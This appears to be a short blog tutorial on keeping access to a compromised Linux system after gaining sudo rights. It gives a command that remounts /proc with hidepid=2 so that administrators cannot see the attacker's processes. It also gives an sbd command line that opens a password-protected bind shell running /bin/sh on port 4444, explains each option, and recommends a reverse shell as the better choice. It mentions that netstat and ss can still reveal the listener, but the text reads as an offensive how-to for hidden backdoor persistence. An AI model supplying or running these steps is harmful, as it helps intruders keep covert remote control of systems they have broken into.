Maintaining Access With sbd

sbd is a program similar to netcat that allows one to read and write to TCP sockets.  sbd is fully portable and is available Windows and Unix/Linux operating systems.

In this post I will show how after one gains privileged access to a system they can maintain access using sbd. I will also illustrate some of the pitfalls of using tools like sbd.

After compromising an account that has sudo rights remount the proc file system as follows :

sudo mount -o remount,rw,hidepid=2 /proc
 
This command will remount the proc file system and preclude users from accessing /proc and /proc/PID.  This will hide all processes from users except ones they own.  A unobservant administrator may not notice this at first when logging in under their own account.

Note that this option is only available under Linux kernels 3.2+.  Also, root will still be able to see all processes.

Next run sbd.  An example of possible options are:

sbd – l-c on -k password -vv -n -e /bin/sh -p 4444

-c on : encryption on
-k password : enable password authentication where password is the password
-vv : verbose
-n : disable name resolution
-e : execute program on connection
-p port : listen on port
-l : listen for connections

As the following examples show, the process is hidden from the non-privileged user, but the ss command still shows the host is listening on port 4444.

00.png01.png

From the other host you can initiate the connection as follows :
03.png
This method of maintaining access is simple but not very robust as sbd can still be discovered via the netstat and ss commands.  Also, note that a bind shell was used in this example, so the port used must be opened on any firewalls.  A reverse shell would be better suited for this case.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s